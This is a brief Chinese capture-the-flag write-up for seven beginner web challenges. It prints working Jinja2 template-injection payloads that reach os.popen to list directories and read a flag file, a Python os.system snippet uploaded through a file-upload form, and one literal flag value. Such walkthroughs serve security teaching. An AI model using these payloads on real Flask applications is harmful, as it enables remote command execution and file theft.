第一题:Simple_SSTI_1
查看源代码:
在flask里,我们建立一个SECRET_KEY,上方模板注入
直接访问URL+?flag={{ config.SECRET_KEY}}得到flag。
第二题:Simple_SSTI_2
ls列举出文件夹中的文件
{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}
{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}
用cat打开这个文件浏览
{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}
第三题:Flask_FileUpload
查看源代码:
在文档中输入:
import os
os.system('ls / ')
在里面找flag
第四题:滑稽
查看源代码flag{b4d196d1edbc6a09845c41732553aa13}
第五题:计算器
正确就会有flag,两位数就会需要打开代码修改长度
第六关:get
根据代码:?what=flag
第七关:post
根据代码:使用HackBar